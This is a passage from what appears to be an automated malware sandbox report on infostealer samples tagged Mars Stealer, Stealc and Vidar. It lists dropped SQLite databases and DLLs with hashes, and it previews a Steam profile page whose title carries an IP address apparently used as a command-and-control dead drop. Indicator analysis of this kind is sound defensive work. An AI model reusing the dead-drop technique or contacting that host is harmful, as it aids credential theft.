| | Gpeym6icI3.exe | malicious | Mars Stealer, Stealc, Vidar | |
| | file.exe | malicious | Vidar | |
| | dc8laldmc8.exe | malicious | Mars Stealer, Stealc, Vidar | |
| | LB4129B9YX.exe | malicious | Mars Stealer, Stealc, Vidar | |
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: LXoASvZRu1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: nXXx6yL69w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: Gpeym6icI3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: dc8laldmc8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: LB4129B9YX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: LXoASvZRu1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: nXXx6yL69w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: Gpeym6icI3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: dc8laldmc8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: LB4129B9YX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):33790
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4366524849824485
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:sdpqm+0Iz3YAA9CWGtwfcDAXZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2SU:sd8m+0Iz3YAA9CWGtwFXZ4VWBCW3KI8u
                                                                                                                                                                                                                                                                                                MD5:632433D44D35FF1988C3E2B8549E05CA
                                                                                                                                                                                                                                                                                                SHA1:4F55F71399E06470BA21A50149525F507B621CD7
                                                                                                                                                                                                                                                                                                SHA-256:4F62733B376F951C2E1829DC3AE3B067B27217991566C9847F2CDABA2C048974
                                                                                                                                                                                                                                                                                                SHA-512:DB32AB4E9D50ABF61868C8FA0B6ADF7B8374682930D40BA07F632747B63B292C7612DAD99074A1A7D96EDF426EED19A5FBBC84BD5DEB43FCBAE42AEC22DD934D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: ve74r https://37.27.87.155|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2459136
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                                                                MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                                                                SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                                                                SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                                                                SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                Encrypted:false
